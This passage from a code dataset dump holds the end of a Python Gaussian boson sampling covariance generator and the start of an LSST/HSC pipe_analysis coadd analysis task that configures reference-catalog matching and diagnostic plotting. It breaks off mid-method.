[-0.156619083736+0.224568570065j, 0.109992223305-0.163750223027j,-0.421179844245+0.183644837982j, 0.818769184612+0.068015658737j]\n ])\n\n d = 4\n try:\n d=int(sys.argv[1]) \n except:\n print(\"Usage python covMatrix_generator d\\n default interferometer dimension d=4\\n\")\n pass\n \n\n U = random_interferometer(d)\n #print(U)\n #print(\"===================\")\n cov = StrawberrySampler(U)\n #cov.get_prob()\n #cov.write_to_csv()\n\n","repo_name":"9Maxwell6/simuGBS","sub_path":"covMatrix_generator.py","file_name":"covMatrix_generator.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16277260514","text":"import copy\nimport os\nimport astropy.units as u\nimport numpy as np\nimport pandas as pd\nimport functools\n\nfrom collections import defaultdict\n\nfrom lsst.daf.base import DateTime\nfrom lsst.daf.persistence.butler import Butler\nfrom lsst.pex.config import (Config, Field, ConfigField, ListField, DictField, ConfigDictField,\n ConfigurableField)\nfrom lsst.pipe.base import CmdLineTask, ArgumentParser, TaskRunner, TaskError, Struct\nfrom lsst.pipe.drivers.utils import TractDataIdContainer\nfrom lsst.meas.astrom import AstrometryConfig\nfrom lsst.pipe.tasks.parquetTable import MultilevelParquetTable\nfrom lsst.pipe.tasks.colorterms import Colorterm, ColortermLibrary\n\nfrom lsst.meas.algorithms import LoadIndexedReferenceObjectsTask\n\nfrom .analysis import AnalysisConfig, Analysis\nfrom .utils import (Enforcer, MagDiff, MagDiffMatches, MagDiffCompare, AstrometryDiff, AngularDistance,\n TraceSize, PsfTraceSizeDiff, TraceSizeCompare, PercentDiff, E1Resids, E2Resids,\n FootAreaDiffCompare, MagDiffCompareErr,\n CentroidDiff, deconvMom, deconvMomStarGal, concatenateCatalogs, joinMatches,\n matchAndJoinCatalogs, checkPatchOverlap, addColumnsToSchema, addFpPoint,\n addFootprintArea, makeBadArray, addElementIdColumn, addIntFloatOrStrColumn,\n calibrateSourceCatalog, backoutApCorr, matchNanojanskyToAB, fluxToPlotString,\n andCatalog, writeParquet, getRepoInfo, addAliasColumns, addPreComputedColumns,\n computeMeanOfFrac, savePlots, updateVerifyJob, getSchema, loadDenormalizeAndUnpackMatches,\n loadReferencesAndMatchToCatalog, computeAreaDict, getParquetColumnsList)\nfrom .plotUtils import (CosmosLabeller, AllLabeller, StarGalaxyLabeller, OverlapsStarGalaxyLabeller,\n MatchesStarGalaxyLabeller, determineExternalCalLabel, getPlotInfo)\n\nimport lsst.afw.cameraGeom as cameraGeom\nimport lsst.afw.image as afwImage\nimport lsst.afw.table as afwTable\nimport lsst.daf.butler as dafButler\nimport lsst.geom as geom\nimport lsst.verify as verify\n\nnp.seterr(all=\"ignore\")\n\n__all__ = [\"CoaddAnalysisConfig\", \"CoaddAnalysisRunner\", \"CoaddAnalysisTask\", \"CompareCoaddAnalysisConfig\",\n \"CompareCoaddAnalysisRunner\", \"CompareCoaddAnalysisTask\"]\n\nNANOJANSKYS_PER_AB_FLUX = (0*u.ABmag).to_value(u.nJy)\nFLAGCOLORS = [\"yellow\", \"greenyellow\", \"aquamarine\", \"orange\", \"fuchsia\", \"gold\", \"lightseagreen\", \"lime\"]\nfilterToBandMap = {\"HSC-G\": \"g\", \"HSC-R\": \"r\", \"HSC-R2\": \"r\", \"HSC-I\": \"i\", \"HSC-I2\": \"i\",\n \"HSC-Z\": \"z\", \"HSC-Y\": \"y\", \"NB0921\": \"N921\"}\n\n\nclass CoaddAnalysisConfig(Config):\n coaddName = Field(dtype=str, default=\"deep\", doc=\"Name for coadd\")\n matchRadiusRaDec = Field(dtype=float, default=0.5, doc=\"RaDec Matching radius (arcseconds)\")\n matchOverlapRadius = Field(dtype=float, default=0.5, doc=\"Matching radius for overlaps (arcseconds)\")\n matchXy = Field(dtype=bool, default=False, doc=\"Perform matching based on X/Y pixel values?\")\n matchRadiusXy = Field(dtype=float, default=3.0, doc=(\"X/Y Matching radius (pixels): \"\n \"ignored unless matchXy=True\"))\n colorterms = ConfigField(dtype=ColortermLibrary,\n doc=(\"Library of color terms.\"\n \"\\nNote that the colorterms, if any, need to be loaded in a config \"\n \"override file. See obs_subaru/config/hsc/coaddAnalysis.py for an \"\n \"example. If the colorterms for the appropriate reference dataset are \"\n \"loaded, they will be applied. Otherwise, no colorterms will be applied \"\n \"to the reference catalog.\"))\n doApplyColorTerms = Field(dtype=bool, default=True, doc=\"Apply colorterms to reference magnitudes?\")\n analysis = ConfigField(dtype=AnalysisConfig, doc=\"Analysis plotting options\")\n analysisAstromMatches = ConfigField(dtype=AnalysisConfig,\n doc=\"Analysis plotting options for astrometric reference matches\")\n analysisPhotomMatches = ConfigField(dtype=AnalysisConfig,\n doc=\"Analysis plotting options for photometric reference matches\")\n matchesMaxDistance = Field(dtype=float, default=0.15, doc=\"Maximum plotting distance for matches\")\n minSrcSignalToNoiseForMatches = Field(dtype=float, default=30, doc=\"Minimum signal to noise level of \"\n \"pipeline catalog sources to be considered when matching to an \"\n \"external reference catalog. Eliminating very low S/N sources \"\n \"before matching is beneficial for speed and avoiding erroneous \"\n \"matches.\")\n externalCatalogs = ConfigDictField(keytype=str, itemtype=AstrometryConfig, default={},\n doc=\"Additional external catalogs for matching\")\n astromRefCat = Field(dtype=str, default=\"gaia\", doc=\"Name of reference catalog for astrometry. \"\n \"Can be either gaia or ps1, in which case the default version will be used, \"\n \"or the full name including the version can be specified \"\n \"(e.g. gaia_dr2_20200414 or ps1_pv3_3pi_20170110)\")\n photomRefCat = Field(dtype=str, default=\"ps1\", doc=\"Name of reference catalog for photometry. \"\n \"Can be ps1, in which case the default version will be used, or the full \"\n \"name including the version can be specified (e.g. ps1_pv3_3pi_20170110)\")\n astromRefObjLoader = ConfigurableField(target=LoadIndexedReferenceObjectsTask,\n doc=\"Reference object loader for astrometry\")\n photomRefObjLoader = ConfigurableField(target=LoadIndexedReferenceObjectsTask,\n doc=\"Reference object loader for photometry\")\n doPlotMags = Field(dtype=bool, default=True, doc=\"Plot magnitudes? (ignored if plotMatchesOnly is True)\")\n doPlotSizes = Field(dtype=bool, default=True, doc=\"Plot PSF sizes? (ignored if plotMatchesOnly is True)\")\n doPlotCentroids = Field(dtype=bool, default=True, doc=(\"Plot centroids? \"\n \"(ignored if plotMatchesOnly is True)\"))\n doApCorrs = Field(dtype=bool, default=True, doc=(\"Plot aperture corrections? \"\n \"(ignored if plotMatchesOnly is True)\"))\n doBackoutApCorr = Field(dtype=bool, default=False, doc=\"Backout aperture corrections?\")\n doAddAperFluxHsc = Field(dtype=bool, default=False,\n doc=\"Add a field containing 12 pix circular aperture flux to HSC table?\")\n doPlotStarGalaxy = Field(dtype=bool, default=True, doc=(\"Plot star/galaxy? \"\n \"(ignored if plotMatchesOnly is True)\"))\n doPlotOverlaps = Field(dtype=bool, default=True, doc=(\"Plot overlaps? \"\n \"(ignored if plotMatchesOnly is True)\"))\n plotMatchesOnly = Field(dtype=bool, default=False, doc=(\"Only make plots related to reference cat\"\n \"matches?\"))\n doPlotMatches = Field(dtype=bool, default=True, doc=\"Plot matches?\")\n doPlotCompareUnforced = Field(dtype=bool, default=True, doc=(\"Plot difference between forced and unforced\"\n \"? (ignored if plotMatchesOnly is True)\"))\n doPlotRhoStatistics = Field(dtype=bool, default=True, doc=(\"Plot Rho statistics?\"))\n treecorrParams = DictField(keytype=str, itemtype=None, optional=True,\n default={\"nbins\": 11, \"min_sep\": 0.5, \"max_sep\": 20,\n \"sep_units\": \"arcmin\", \"verbose\": 0},\n doc=(\"keyword arguments to be passed to treecorr,\"\n \"if doPlotRhoStatistics is True\"))\n doPlotQuiver = Field(dtype=bool, default=True, doc=(\"Plot ellipticity residuals quiver plot? \"\n \"(ignored if plotMatchesOnly is True)\"))\n doPlotPsfFluxSnHists = Field(dtype=bool, default=True, doc=\"Plot histograms of raw PSF fluxes and S/N?\")\n doPlotFootprintArea = Field(dtype=bool, default=True, doc=(\"Plot histogram of footprint area? \"\n \"(ignored if plotMatchesOnly is True)\"))\n doPlotInputCounts = Field(dtype=bool, default=True, doc=(\"Make input counts plot? \"\n \"(ignored if plotMatchesOnly is True)\"))\n doPlotSkyObjects = Field(dtype=bool, default=True, doc=\"Make sky object plots?\")\n doPlotSkyObjectsSky = Field(dtype=bool, default=False, doc=\"Make sky projection sky object plots?\")\n onlyReadStars = Field(dtype=bool, default=False, doc=\"Only read stars (to save memory)?\")\n toMilli = Field(dtype=bool, default=True, doc=\"Print stats in milli units (i.e. mas, mmag)?\")\n srcSchemaMap = DictField(keytype=str, itemtype=str, default=None, optional=True,\n doc=\"Mapping between different stack (e.g. HSC vs. LSST) schema names\")\n fluxToPlotList = ListField(dtype=str, default=[\"base_GaussianFlux\", \"base_CircularApertureFlux_12_0\",\n \"ext_photometryKron_KronFlux\", \"modelfit_CModel\"],\n doc=\"List of fluxes to plot: mag(flux)-mag(base_PsfFlux) vs mag(fluxColumn)\")\n gaapFluxList = ListField(dtype=str, default=[\"ext_gaap_GaapFlux_1_15x_Optimal\",\n \"ext_gaap_GaapFlux_1_15x_PsfFlux\"],\n doc=\"List of possible GAaP fluxes to add to fluxToPlotList\")\n # We want the following to come from the *_meas catalogs as they reflect\n # what happened in SFP calibration.\n columnsToCopyFromMeas = ListField(dtype=str, default=[\"calib_\", \"deblend_parentNPeaks\", \"deblend_nPeaks\",\n \"deblend_scarletFlux\", \"deblend_skipped\"],\n doc=\"List of string \\\"prefixes\\\" to identify the columns to copy. \"\n \"All columns with names that start with one of these strings will be \"\n \"copied from the *_meas catalogs into the *_forced_src catalogs \"\n \"UNLESS the full column name contains one of the strings listed \"\n \"in the notInColumnStrList config.\")\n # We want the following to come from the *_ref catalogs as they reflect\n # the forced measurement states.\n columnsToCopyFromRef = ListField(dtype=str,\n default=[\"detect_\", \"merge_peak_sky\", \"merge_measurement_\", ],\n doc=\"List of string \\\"prefixes\\\" to identify the columns to copy. \"\n \"All columns with names that start with one of these strings will be \"\n \"copied from the *_ref catalogs into the *_forced_src catalogs \"\n \"UNLESS the full column name contains one of the strings listed \"\n \"in the notInColumnStrList config.\")\n baseColStrList = ListField(\n dtype=str,\n default=[\"coord\", \"tract\", \"patch\", \"visit\", \"ccd\", \"base_PixelFlags\", \"base_GaussianFlux\",\n \"base_PsfFlux\", \"base_CircularApertureFlux_9_0_instFlux\", \"base_CircularApertureFlux_12_0\",\n \"base_CircularApertureFlux_25_0\", \"ext_photometryKron_KronFlux\", \"modelfit_CModel\",\n \"base_Sdss\", \"slot_Centroid\", \"slot_Shape\", \"ext_shapeHSM_HsmSourceMoments_\",\n \"ext_shapeHSM_HsmPsfMoments_\", \"ext_shapeHSM_HsmShapeRegauss_\", \"base_Footprint\",\n \"base_FPPosition\", \"base_ClassificationExtendedness\", \"parent\", \"detect\", \"deblend_nChild\",\n \"deblend_parentNPeaks\", \"deblend_nPeaks\", \"deblend_scarletFlux\", \"deblend_skipped\",\n \"base_Blendedness_abs\", \"base_Blendedness_flag\", \"base_InputCount\",\n \"merge_peak_sky\", \"merge_measurement\", \"calib\", \"sky_source\",\n \"ext_gaap_GaapFlux_1_15x_Optimal_\", \"ext_gaap_GaapFlux_1_15x_PsfFlux_\"],\n doc=(\"List of \\\"startswith\\\" strings of column names to load from deepCoadd_obj parquet table. \"\n \"All columns that start with one of these strings will be loaded UNLESS the full column \"\n \"name contains one of the strings listed in the notInColumnStrList config.\"))\n notInColStrList = ListField(\n dtype=str,\n default=[\"flag_bad\", \"flag_no\", \"missingDetector_flag\", \"_region_\", \"Truncated\", \"_radius\",\n \"_bad_\", \"initial\", \"_exp_\", \"_dev_\", \"fracDev\", \"objective\", \"SdssCentroid_flag_\",\n \"SdssShape_flag_u\", \"SdssShape_flag_m\", \"_Cov\", \"_child_\", \"_parent_\"],\n doc=(\"List of substrings to select against when creating list of columns to load from the \"\n \"deepCoadd_obj parquet table.\"))\n flagsToAlias = DictField(keytype=str, itemtype=str,\n default={\"calib_psf_used\": \"calib_psfUsed\",\n \"calib_psf_candidate\": \"calib_psfCandidate\",\n \"calib_astrometry_used\": \"calib_astrometryUsed\"},\n doc=(\"List of flags to alias to old, pre-RFC-498, names for backwards \"\n \"compatibility with old processings\"))\n doReadParquetTables = Field(dtype=bool, default=True,\n doc=(\"Read parquet tables from postprocessing (e.g. deepCoadd_obj) as \"\n \"input data instead of afwTable catalogs.\"))\n doWriteParquetTables = Field(dtype=bool, default=True,\n doc=(\"Write out Parquet tables (for subsequent interactive analysis)?\"\n \"\\nNOTE: if True but fastparquet package is unavailable, a warning is \"\n \"issued and table writing is skipped.\"))\n writeParquetOnly = Field(dtype=bool, default=False,\n doc=\"Only write out Parquet tables (i.e. do not produce any plots)?\")\n hasFakes = Field(dtype=bool, default=False, doc=\"Include the analysis of the added fake sources?\")\n readFootprintsAs = Field(dtype=str, default=None, optional=True,\n doc=(\"What type of Footprint to read in along with the catalog: \"\n \"\\n None : do not read in Footprints.\"\n \"\\n\\\"light\\\": read in regular Footprints (include SpanSet and list of\"\n \"\\n peaks per Footprint).\"\n \"\\n\\\"heavy\\\": read in HeavyFootprints (include regular Footprint plus\"\n \"\\n flux values per Footprint).\"))\n\n def saveToStream(self, outfile, root=\"root\"):\n \"\"\"Required for loading colorterms from a Config outside the \"lsst\"\n namespace.\n \"\"\"\n print(\"import lsst.meas.photocal.colorterms\", file=outfile)\n return Config.saveToStream(self, outfile, root)\n\n def setDefaults(self):\n Config.setDefaults(self)\n\n def validate(self):\n Config.validate(self)\n if self.writeParquetOnly and not self.doWriteParquetTables:\n raise ValueError(\"Cannot writeParquetOnly if doWriteParquetTables is False\")\n if self.hasFakes and self.doReadParquetTables:\n raise ValueError(\"Have not yet accommodated parquet reading for fakes catalogs. \"\n \"Try running with doReadParquetTables=False\")\n if self.plotMatchesOnly:\n self.doPlotMatches = True\n if self.plotMatchesOnly or self.writeParquetOnly:\n self.doPlotOverlaps = False\n self.doPlotCompareUnforced = False\n self.doPlotPsfFluxSnHists = False\n self.doPlotSkyObjectsSky = False\n self.doPlotSkyObjects = False\n self.doPlotFootprintArea = False\n self.doPlotRhoStatistics = False\n self.doPlotQuiver = False\n self.doPlotInputCounts = False\n self.doPlotMags = False\n self.doPlotStarGalaxy = False\n self.doPlotSizes = False\n self.doPlotCentroids = False\n\n # Set the astrometry reference catalog parameters based on configs\n if \"gaia\" in self.astromRefCat:\n if len(self.astromRefCat) == len(\"gaia\"):\n self.astromRefObjLoader.ref_dataset_name = \"gaia_dr2_20200414\"\n else:\n self.astromRefObjLoader.ref_dataset_name = self.astromRefCat\n self.astromRefObjLoader.anyFilterMapsToThis = \"phot_g_mean\"\n self.astromRefObjLoader.requireProperMotion = True\n elif \"ps1\" in self.astromRefCat:\n if len(self.astromRefCat) == len(\"ps1\"):\n self.astromRefObjLoader.ref_dataset_name = \"ps1_pv3_3pi_20170110\"\n else:\n self.astromRefObjLoader.ref_dataset_name = self.astromRefCat\n elif \"ref_cat\" in self.astromRefCat:\n self.astromRefObjLoader.ref_dataset_name = self.astromRefCat\n else:\n raise RuntimeError(\"Unknown astrometry reference catatlog name. Can be either gaia \"\n \"(or gaia_version_date) or ps1 (or ps1_version_date), but got {}\".\n format(self.astromRefCat))\n # Set the photometry reference catalog parameters based on configs\n if \"ps1\" in self.photomRefCat:\n if len(self.photomRefCat) == len(\"ps1\"):\n self.photomRefObjLoader.ref_dataset_name = \"ps1_pv3_3pi_20170110\"\n else:\n self.photomRefObjLoader.ref_dataset_name = self.photomRefCat\n elif \"ref_cat\" in self.photomRefCat:\n self.astromRefObjLoader.ref_dataset_name = self.photomRefCat\n else:\n raise RuntimeError(\"Unknown photometry reference catatlog name. Must be ps1 or \"\n \"ps1_version_date, but got {}\".format(self.photomRefCat))\n\n\nclass CoaddAnalysisRunner(TaskRunner):\n @staticmethod\n def getTargetList(parsedCmd, **kwargs):\n kwargs[\"cosmos\"] = parsedCmd.cosmos\n kwargs[\"subdir\"] = parsedCmd.subdir\n\n idParser = parsedCmd.id.__class__(parsedCmd.id.level)\n idParser.idList = parsedCmd.id.idList\n idParser.datasetType = parsedCmd.id.datasetType\n idParser.makeDataRefList(parsedCmd)\n\n # Check for existence of appropriate dataset: parquet obj vs. afwTable\n # catalogs.\n datasetList = [\"obj\"] if parsedCmd.config.doReadParquetTables else [\"forced_src\", \"meas\"]\n # Partition all inputs by tract,filter\n FilterRefsDict = functools.partial(defaultdict, list) # Dict for filter-->dataRefs\n\n if parsedCmd.collection is not None:\n repoRootDir = \"/repo/dc2\" if parsedCmd.instrument == \"LSSTCam-imSim\" else \"/repo/main\"\n if parsedCmd.instrument is None:\n raise RuntimeError(\"Must provide --instrument command line option for gen3 repos.\")\n butlerGen3 = dafButler.Butler(repoRootDir, collections=parsedCmd.collection,\n instrument=parsedCmd.instrument)\n butlerGen2 = parsedCmd.butler\n parsedCmd.butler = butlerGen3\n kwargs[\"butlerGen2\"] = butlerGen2\n\n tract = parsedCmd.id.refList[0][0].dataId[\"tract\"]\n skyMap = butlerGen3.get(\"skyMap\")\n tractInfo = skyMap.generateTract(tract)\n # Create a mapping from N,N patchId of Gen2 to integer id of Gen3\n patchIdToGen3Map = {}\n for patch in tractInfo:\n patchIndexStr = str(patch.getIndex()[0]) + \",\" + str(patch.getIndex()[1])\n patchIdToGen3Map[patchIndexStr] = tractInfo.getSequentialPatchIndex(patch)\n\n tractFilterRefs = defaultdict(FilterRefsDict) # tract-->filter-->dataRefs\n patchList = []\n gen3RefList = []\n for pId in parsedCmd.id.refList[0]:\n patchList.append(pId.dataId[\"patch\"])\n\n gen3PidList = idParser.idList.copy()\n if len(gen3PidList) == 1 and len(gen3PidList) < len(patchList):\n gen3PidList = gen3PidList*len(patchList)\n for gen3Pid, patchId in zip(gen3PidList, patchList):\n gen3PidCopy = copy.deepcopy(gen3Pid)\n if \"filter\" in gen3PidCopy:\n gen3PidCopy[\"physical_filter\"] = gen3PidCopy.pop(\"filter\")\n physical_filter = gen3PidCopy[\"physical_filter\"]\n if parsedCmd.instrument == \"HSC\":\n gen3PidCopy[\"band\"] = filterToBandMap[gen3PidCopy[\"physical_filter\"]]\n gen3PidCopy[\"skymap\"] = \"hsc_rings_v1\"\n elif parsedCmd.instrument == \"LSSTCam-imSim\":\n gen3PidCopy[\"band\"] = gen3PidCopy[\"physical_filter\"]\n gen3PidCopy[\"skymap\"] = \"DC2\"\n else:\n raise RuntimeError(\"Unknown instrument {}. Currently only know HSC and \"\n \"LSSTCam-imSim.\".format(parsedCmd.instrument))\n gen3PidCopy[\"dataId\"] = gen3PidCopy.copy()\n gen3PidCopy[\"butler\"] = butlerGen3\n gen3PidCopy[\"patchId\"] = patchId\n gen3PidCopy[\"patch\"] = patchIdToGen3Map[patchId]\n gen3PidCopy[\"dataId\"][\"patch\"] = patchIdToGen3Map[patchId]\n gen3PidCopy[\"camera\"] = parsedCmd.instrument\n gen3RefList.append(gen3PidCopy)\n tractFilterRefs[tract][physical_filter] = gen3RefList\n else:\n # Make sure the actual input files requested exist (i.e. do not\n # follow the parent chain). If reading afwTable catalogs, first\n # check for forced catalogs. Break out of datasets loop if forced\n # catalogs were found, otherwise continue search for existence of\n # unforced (i.e. meas) catalogs.\n for dataset in datasetList:\n tractFilterRefs = defaultdict(FilterRefsDict) # tract-->filter-->dataRefs\n for patchRef in sum(parsedCmd.id.refList, []):\n tract = patchRef.dataId[\"tract\"]\n filterName = patchRef.dataId[\"filter\"]\n inputDataFile = patchRef.get(\"deepCoadd_\" + dataset + \"_filename\")[0]\n if parsedCmd.input not in parsedCmd.output:\n inputDataFile = inputDataFile.replace(parsedCmd.output, parsedCmd.input)\n if os.path.exists(inputDataFile):\n tractFilterRefs[tract][filterName].append(patchRef)\n if tractFilterRefs:\n break\n\n if not tractFilterRefs:\n raise RuntimeError(\"No suitable datasets found.\")\n\n return [(tractFilterRefs[tract][filterName], kwargs) for tract in tractFilterRefs for\n filterName in tractFilterRefs[tract]]\n\n\nclass CoaddAnalysisTask(CmdLineTask):\n _DefaultName = \"coaddAnalysis\"\n ConfigClass = CoaddAnalysisConfig\n RunnerClass = CoaddAnalysisRunner\n AnalysisClass = Analysis\n outputDataset = \"plotCoadd\"\n\n @classmethod\n def _makeArgumentParser(cls):\n parser = ArgumentParser(name=cls._DefaultName)\n parser.add_argument(\"--cosmos\", default=None, help=\"Filename for Leauthaud Cosmos catalog\")\n parser.add_argument(\"--collection\", required=False, default=None,\n help=\"Collection for rerun if it is Gen3. NOTE: must still point to a gen2 \"\n \"input to get a valid parsed data reference list and a gen2-stlye rerun for \"\n \"plot persistence. E.g. \"\n \"/datasets/hsc/repo/ --rerun RC/w_2021_NN/DM-NNNNN:private/username/outDir \"\n \"--collection HSC/runs/RC2/w_2021_NN/DM-NNNNN --instrument HSC or \"\n \"/datasets/DC2/repoRun2.2i \"\n \"--rerun w_2021_NN/DM-NNNNN/multi:private/username/outDir \"\n \" --collection 2.2i/runs/test-med-1/w_2021_NN/DM-NNNNN \"\n \"--instrument LSSTCam-imSim\")\n parser.add_argument(\"--instrument\", required=False, default=None,\n help=\"Instrument for run if it is Gen3\")\n parser.add_id_argument(\"--id\", \"deepCoadd_meas\",\n help=\"data ID, e.g. --id tract=12345 patch=1,2 filter=HSC-X\",\n ContainerClass=TractDataIdContainer)\n parser.add_argument(\"--subdir\", type=str, default=\"\",\n help=(\"Subdirectory below plots/filter/tract-NNNN/ (useful for, \"\n \"e.g., subgrouping of Patches. Ignored if only one Patch is \"\n \"specified, in which case the subdir is set to patch-NNN\"))\n return parser\n\n def __init__(self, *args, **kwargs):\n CmdLineTask.__init__(self, *args, **kwargs)\n self.zpLabel = None\n self.unitScale = 1000.0 if self.config.toMilli else 1.0\n self.matchRadius = self.config.matchRadiusXy if self.config.matchXy else self.config.matchRadiusRaDec\n self.matchRadiusUnitStr = \" (pixels)\" if self.config.matchXy else \"\\\"\"\n\n self.verifyJob = verify.Job.load_metrics_package(subset=\"pipe_analysis\")\n\n def runDataRef(self, patchRefList, subdir=\"\", cosmos=None, butlerGen2=None):\n plotList = []\n dataset = \"Coadd_obj\" if self.config.doReadParquetTables else \"Coadd_forced_src\"\n haveForced = False # do forced datasets exits (may not for single band datasets)\n patchRefExistsList = []\n for patchRef in patchRefList:\n if hasattr(patchRef, \"dataId\"):\n dataId = patchRef.dataId\n if patchRef.datasetExists(self.config.coaddName + dataset):\n patchRefExistsList.append(patchRef)\n else:\n dataId = patchRef[\"dataId\"]\n try:\n patchRef[\"butler\"].getURI(self.config.coaddName + dataset, dataId=dataId)\n except LookupError:\n self.log.warning(\"No {} found for {}. Skipping patch... \".\n format(self.config.coaddName + dataset, dataId))\n continue\n if \"_obj\" in dataset:\n cat = patchRef[\"butler\"].get(self.config.coaddName + dataset, dataId=dataId)\n if dataId[\"band\"] in cat.columns.levels[1]:\n patchRefExistsList.append(patchRef)\n else:\n patchRefExistsList.append(patchRef)\n\n if len(patchRefExistsList) == 0:\n raise TaskError(\"No data exists for {}\".format(dataset))\n\n if len(patchRefExistsList) > 0:\n haveForced = True\n else:\n self.log.warning(\"No forced dataset exists for, e.g.,: {:} (only showing first dataId in \"\n \"patchRefList).\\nPlotting unforced results only.\".format(dataId))\n dataset = \"Coadd_meas\"\n if not patchRefList[0].datasetExists(self.config.coaddName + dataset):\n raise TaskError(\"No data exists in patRefList: %s\" %\n ([patchRef.dataId for patchRef in patchRefList]))\n\n repoInfo = getRepoInfo(patchRefExistsList[0], coaddName=self.config.coaddName, coaddDataset=dataset)\n # Explicit input file was checked in CoaddAnalysisRunner, so a check\n # on datasetExists is sufficient here (modulo the case where a forced\n # dataset exists higher up the parent tree than the specified input,\n # but does not exist in the input directory as the former will be\n # found).\n dataId = patchRefExistsList[0][\"dataId\"] if repoInfo.isGen3 else patchRefExistsList[0].dataId\n\n forcedStr = \"forced\" if haveForced else \"unforced\"\n if self.config.doBackoutApCorr:\n self.log.info(\"Backing out aperture corrections from all fluxes\")\n forcedStr += \"\\n (noApCorr)\"\n\n if not repoInfo.isGen3:\n patchList = [patchRef.dataId[\"patch\"] for patchRef in patchRefExistsList]\n patchIdList = patchList\n else:\n patchList = [patchRef[\"dataId\"][\"patch\"] for patchRef in patchRefExistsList]\n patchIdList = [patchRef[\"patchId\"] for patchRef in patchRefExistsList]\n self.log.info(\"patchList size: {:d}\".format(len(patchList)))\n\n subdir = \"patch-\" + str(patchList[0]) if len(patchList) == 1 else subdir\n repoInfo.dataId[\"subdir\"] = \"/\" + subdir\n\n plotInfoDict = getPlotInfo(repoInfo)\n plotInfoDict.update(dict(plotType=\"plotCoadd\", subdir=subdir, patchList=patchList,\n patchIdList=patchIdList, hscRun=repoInfo.hscRun,\n tractInfo=repoInfo.tractInfo, dataId=repoInfo.dataId, ccdList=None))\n # Find a visit/ccd input so that you can check for meas_mosaic input\n # (i.e. to set uberCalLabel).\n self.uberCalLabel = determineExternalCalLabel(repoInfo, patchList[0], coaddName=self.config.coaddName)\n self.log.info(f\"External calibration(s) used: {self.uberCalLabel}\")\n\n # Set some aliases for differing schema naming conventions\n aliasDictList = [self.config.flagsToAlias, ]\n if repoInfo.hscRun and self.config.srcSchemaMap is not None:\n aliasDictList += [self.config.srcSchemaMap]\n\n # Always highlight points with x-axis flag set (for cases where\n # they do not get explicitly filtered out).\n highlightList = [(self.config.analysis.fluxColumn.replace(\"_instFlux\", \"_flag\"), 0, \"turquoise\")]\n for ih, flagName in enumerate(list(self.config.analysis.flags)):\n if not any(flagName in highlight for highlight in highlightList):\n highlightList += [(flagName, 0, FLAGCOLORS[ih%len(FLAGCOLORS)]), ]\n # Dict of all parameters common to plot* functions\n plotKwargs = dict(zpLabel=self.zpLabel, uberCalLabel=self.uberCalLabel)\n\n if any(doPlot for doPlot in\n [self.config.doPlotOverlaps, self.config.doPlotCompareUnforced,\n self.config.doPlotPsfFluxSnHists, self.config.doPlotSkyObjects,\n self.config.doPlotSkyObjectsSky, self.config.doPlotFootprintArea,\n self.config.doPlotMags, self.config.doPlotStarGalaxy,\n self.config.doPlotRhoStatistics, cosmos, self.config.externalCatalogs,\n self.config.doWriteParquetTables]) and not self.config.plotMatchesOnly:\n\n if self.config.doReadParquetTables:\n if haveForced:\n forced, _ = self.readParquetTables(patchRefExistsList, self.config.coaddName + dataset,\n repoInfo, dfDataset=\"forced_src\")\n unforced, _ = self.readParquetTables(patchRefExistsList, self.config.coaddName + dataset,\n repoInfo, dfDataset=\"meas\")\n areaDict, _ = computeAreaDict(repoInfo, patchRefExistsList,\n dataset=self.config.coaddName + \"Coadd\", fakeCat=None)\n else:\n catalogStruct = self.readAfwCoaddTables(patchRefExistsList, repoInfo, haveForced,\n aliasDictList=aliasDictList)\n unforced = catalogStruct.unforced\n forced = catalogStruct.forced\n areaDict = catalogStruct.areaDict\n\n patchExistsList = []\n patchIdExistsList = []\n for patchRef in patchRefExistsList:\n patch = patchRef[\"dataId\"][\"patch\"] if repoInfo.isGen3 else patchRef.dataId[\"patch\"]\n patchId = patchRef[\"patchId\"] if repoInfo.isGen3 else patchRef.dataId[\"patch\"]\n patchExistsList.append(patch)\n patchIdExistsList.append(patchId)\n plotInfoDict.update(dict(patchIdList=patchIdExistsList))\n self.log.info(\"List of patches for which data exists: {}\".format(patchIdExistsList))\n\n plotKwargs.update(dict(zpLabel=self.zpLabel))\n unforcedSchema = getSchema(unforced)\n if haveForced:\n forcedSchema = getSchema(forced)\n\n # Make sub-catalog of sky objects before flag culling as many of\n # these will have flags set due to measurement difficulties in\n # regions that are really blank sky.\n if self.config.doPlotSkyObjectsSky:\n skyObjCatAll = unforced[unforced[\"merge_peak_sky\"]].copy(deep=True)\n if self.config.doPlotSkyObjects:\n baseGoodSky = (unforced[\"merge_peak_sky\"] & (unforced[\"base_InputCount_value\"] > 0)\n & ~unforced[\"base_PixelFlags_flag_edge\"])\n if \"detect_isDeblendedSource\" in unforcedSchema:\n baseGoodSky &= unforced[\"detect_isDeblendedSource\"]\n skyObjCat = unforced[baseGoodSky].copy(deep=True)\n\n # Must do the overlaps before purging the catalogs of non-primary\n # sources. We only really need one set of these plots and the\n # matching takes a fair amount of time, so only plot for one\n # catalog, favoring the forced catalog if it exists.\n if self.config.doPlotOverlaps:\n # Determine if any patches in patchExistsList actually overlap\n overlappingPatches = checkPatchOverlap(plotInfoDict[\"patchList\"], plotInfoDict[\"tractInfo\"])\n if not overlappingPatches:\n self.log.info(\"No overlapping patches...skipping overlap plots\")\n else:\n if haveForced:\n forcedOverlaps = self.overlaps(forced, patchExistsList, repoInfo.tractInfo)\n if forcedOverlaps is not None:\n plotList.append(self.plotOverlaps(forcedOverlaps, plotInfoDict, areaDict,\n matchRadius=self.config.matchOverlapRadius,\n matchRadiusUnitStr=\"\\\"\",\n forcedStr=forcedStr, postFix=\"_forced\",\n fluxToPlotList=[\"modelfit_CModel\", ],\n highlightList=highlightList, **plotKwargs))\n self.log.info(\"Number of forced overlap objects matched = {:d}\".\n format(len(forcedOverlaps)))\n else:\n self.log.info(\"No forced overlap objects matched. Overlap plots skipped.\")\n else:\n unforcedOverlaps = self.overlaps(unforced, patchExistsList, repoInfo.tractInfo)\n if unforcedOverlaps is not None:\n plotList.append(\n self.plotOverlaps(unforcedOverlaps, plotInfoDict, areaDict,\n matchRadius=self.config.matchOverlapRadius,\n matchRadiusUnitStr=\"\\\"\",\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n postFix=\"_unforced\", fluxToPlotList=[\"modelfit_CModel\", ],\n highlightList=highlightList, **plotKwargs))\n self.log.info(\"Number of unforced overlap objects matched = {:d}\".\n format(len(unforcedOverlaps)))\n else:\n self.log.info(\"No unforced overlap objects matched. Overlap plots skipped.\")\n\n # 